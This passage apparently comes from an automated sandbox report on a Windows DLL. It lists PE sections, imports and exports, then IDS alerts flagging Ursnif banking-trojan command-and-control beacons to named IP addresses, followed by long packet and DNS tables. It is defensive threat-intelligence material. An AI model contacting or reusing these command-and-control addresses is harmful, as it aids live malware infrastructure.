                                                                                                              .reloc0xf50000x2b1c0x2c00False0.760919744318data6.67218651592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_MANIFEST0xf40600x17dXML 1.0 document textEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllCreateProcessA, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GetCurrentDirectoryA, SetSystemPowerState, SetConsoleCP, SetConsoleOutputCP, GetModuleHandleA, CreateFileW, ReadConsoleW, WriteConsoleW, SetStdHandle, OutputDebugStringW, LoadLibraryExW, GetTimeZoneInformation, GetModuleFileNameA, FormatMessageA, GetSystemTimeAsFileTime, GetProcessHeap, VirtualProtect, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, HeapAlloc, RaiseException, RtlUnwind, GetCommandLineA, GetCurrentThreadId, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ExitProcess, GetModuleHandleExW, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, CloseHandle, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, SetFilePointerEx, SetEnvironmentVariableA
                                                                                                              USER32.dllGetWindowThreadProcessId, GetSysColorBrush, GetWindowRect, GetClientRect, GetForegroundWindow, CreatePopupMenu, DialogBoxIndirectParamA, CreateDialogIndirectParamA
                                                                                                              GDI32.dllSetPixel, SelectObject, PatBlt, GetTextExtentPoint32A, StretchBlt

                                                                                                              Exports

                                                                                                              NameOrdinalAddress
                                                                                                              Clockcondition10x1021070
                                                                                                              Dogwhen20x1021fa0
                                                                                                              Sing30x1022080
                                                                                                              Wholegray40x1022270

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              07/14/21-15:47:26.154158TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973180192.168.2.340.97.116.82
                                                                                                              07/14/21-15:48:10.427089TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974980192.168.2.337.120.222.6
                                                                                                              07/14/21-15:48:10.427089TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974980192.168.2.337.120.222.6
                                                                                                              07/14/21-15:48:10.738630TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.337.120.222.6

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jul 14, 2021 15:47:25.989392042 CEST4973180192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:25.989968061 CEST4973280192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.150331974 CEST804973140.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.150696039 CEST4973180192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.150943041 CEST804973240.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.151027918 CEST4973280192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.154158115 CEST4973180192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.318327904 CEST804973140.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.318474054 CEST4973180192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.320472002 CEST4973180192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.328516006 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.481333017 CEST804973140.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.494771957 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.495333910 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.502996922 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.670855999 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.670883894 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.670903921 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.670977116 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.758119106 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.769977093 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.926234961 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.926341057 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.939838886 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.940000057 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.940577030 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:26.980247974 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:26.980273962 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:26.992584944 CEST4434973552.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.992638111 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.992702007 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:26.992758989 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:26.994007111 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:26.994034052 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.008249998 CEST4434973552.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.008328915 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.009030104 CEST4434973552.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.009100914 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.010123014 CEST4434973552.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.010147095 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.010179043 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.010200977 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.010204077 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.010247946 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.010283947 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.024437904 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.025389910 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.038981915 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.039047003 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.040153027 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.040429115 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.040499926 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.042076111 CEST49734443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.054507017 CEST4434973552.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.054573059 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:27.054687977 CEST4434973452.97.201.242192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.070327044 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.071512938 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.084609985 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.084723949 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.085218906 CEST4434973752.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.085330009 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.100254059 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.108099937 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.115005970 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.115029097 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.115086079 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.115086079 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.115111113 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.115128994 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.121824026 CEST4434973752.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.121891022 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.121932983 CEST4434973752.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.121949911 CEST4434973752.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.122030020 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.136324883 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.137356043 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.142796040 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.149606943 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.149624109 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.149713993 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.156028986 CEST4434973752.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.156106949 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.162636042 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.162653923 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.162719965 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.162760019 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.344629049 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.362498045 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.362720013 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:27.472296000 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.472443104 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.480575085 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.489728928 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.489845991 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.492162943 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.528579950 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610167980 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610224009 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610243082 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610280037 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.610312939 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.621855974 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621876955 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621890068 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621989965 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.676908970 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.676973104 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.692152977 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.805732012 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.805771112 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.805836916 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.805869102 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.822774887 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.822900057 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.823189974 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.865708113 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.865712881 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.878146887 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.878179073 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.878413916 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.879163980 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.880019903 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.880135059 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.893385887 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893428087 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893445969 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893712044 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893740892 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893764973 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893800974 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.893832922 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.895772934 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.895807981 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905314922 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905325890 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905906916 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.918260098 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918688059 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918766022 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918792963 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921442032 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.921480894 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921566010 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921765089 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.933998108 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.950299025 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.968878984 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.968952894 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.981242895 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.981312990 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.981385946 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.981458902 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.982570887 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.982765913 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.995965004 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996010065 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996062040 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996067047 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996077061 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996094942 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996103048 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996126890 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996139050 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996156931 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996195078 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.005089998 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.006068945 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.006774902 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.018382072 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.018570900 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.018647909 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.020140886 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.020221949 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.025572062 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.025607109 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.025651932 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.025672913 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.917479038 CEST4973280192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:28.917793989 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:28.917851925 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:28.919277906 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:29.447514057 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:29.447717905 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:29.447787046 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:29.448146105 CEST49740443192.168.2.352.97.232.194

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jul 14, 2021 15:45:55.488998890 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:45:55.501785040 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:45:56.445756912 CEST6015253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:45:56.460350990 CEST53601528.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:45:57.226844072 CEST5754453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:45:57.242974043 CEST53575448.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:45:58.403458118 CEST5598453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:45:58.417110920 CEST53559848.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:45:59.048475981 CEST6418553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:45:59.062093973 CEST53641858.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:46:00.132510900 CEST6511053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:46:00.146876097 CEST53651108.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:46:03.858011961 CEST5836153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:46:03.870150089 CEST53583618.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:46:04.821085930 CEST6349253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:46:04.833889961 CEST53634928.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:46:45.861063957 CEST6083153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:46:45.881283998 CEST53608318.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:46:48.563987970 CEST6010053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:46:48.583336115 CEST53601008.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:05.280278921 CEST5319553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:05.293802977 CEST53531958.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:06.303096056 CEST5014153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:06.327312946 CEST53501418.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:06.490039110 CEST5302353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:06.503245115 CEST53530238.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:06.687244892 CEST4956353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:06.700505018 CEST53495638.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:07.650053978 CEST5135253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:07.664172888 CEST53513528.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:08.467902899 CEST5934953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:08.481935978 CEST53593498.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:09.481250048 CEST5708453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:09.494187117 CEST53570848.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:10.399305105 CEST5882353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:10.412659883 CEST53588238.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:12.218470097 CEST5756853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:12.233186007 CEST53575688.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:13.336014986 CEST5054053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:13.348953962 CEST53505408.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:14.318495035 CEST5436653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:14.331463099 CEST53543668.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:15.932454109 CEST5303453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:15.945157051 CEST53530348.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:23.454758883 CEST5776253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:23.472738981 CEST53577628.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:25.931644917 CEST5543553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST53554358.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:26.955091953 CEST5071353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST53507138.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.053947926 CEST5613253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST53561328.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.307626009 CEST5898753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST53589878.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.849246025 CEST5657953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST53565798.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.953054905 CEST6063353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST53606338.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:42.406006098 CEST6129253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:42.419842005 CEST53612928.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:50.688385963 CEST6361953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:50.703099012 CEST53636198.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:53.415575027 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:53.428577900 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:54.459445953 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:54.472902060 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:47:55.524586916 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:57.569026947 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:47:57.584511995 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:01.569389105 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:01.581948996 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:09.282047033 CEST6194653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:09.302505016 CEST53619468.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:10.365509987 CEST6491053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:10.393398046 CEST53649108.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:10.698997974 CEST5212353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:10.699883938 CEST5613053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:10.713897943 CEST53561308.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:10.721282005 CEST53521238.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:10.790649891 CEST5633853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:10.803733110 CEST53563388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.821281910 CEST5942053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.827414036 CEST5878453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.834091902 CEST6397853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.834767103 CEST53594208.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.847233057 CEST53639788.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.850749016 CEST6293853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.863822937 CEST53629388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.873614073 CEST5570853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.877441883 CEST5680353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.880283117 CEST5714553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.891727924 CEST53568038.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST53571458.8.8.8192.168.2.3
